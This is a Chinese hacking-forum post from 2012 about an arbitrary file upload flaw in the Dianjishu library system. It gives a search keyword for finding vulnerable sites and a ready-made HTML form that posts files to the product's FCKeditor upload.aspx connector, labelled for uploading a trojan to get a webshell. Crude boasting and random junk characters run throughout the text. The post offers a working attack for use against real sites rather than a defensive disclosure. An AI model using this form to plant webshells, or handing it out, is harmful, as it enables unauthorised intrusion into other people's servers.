主题:图书馆系统任意文件上传漏洞
" s5 P5 }# b C 作者:冰锋刺客
4 \% l; Y; e' `, d: U" ^ 厂商:点击书(dianjishu.com)
0 B9 c) H' H0 c& ] 日期:2012-6-21* Z7 j8 R Q$ Y9 x; j1 E+ G% i
0 t# i- V: W9 y
I 概述
$ J% m- H3 o/ g 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell9 h& U3 O0 N6 m% D* l9 X1 M
II 简介3 A( N0 u, k9 K" F. D. o
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
3 z3 @7 x9 n$ W; b 补充一个漏洞
1 j1 e4 K) R/ T: Q) v, I <form id="frmUpload" enctype="multipart/form-data" y; c% k2 J# n) O B- O
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>+ P0 q2 @$ Y/ z0 d
<input id="btnUpload" type="submit" value="操翻他">8 v, R% j$ g& W `! X4 o2 x, [
</form>( A3 Y5 v9 J$ K8 j2 D% W% S
你们懂的0 N0 Z. K, ^/ Z
那傻逼提供还需要改包.9 z$ \; U8 X. D# p
自己看了下源代码发现fckeditor
7 B; _. H7 k$ m$ e 直接秒杀* E8 C& n! j8 U9 @' D3 L t
|
发表于 2012-9-10 21:20:59
收藏
支持
反对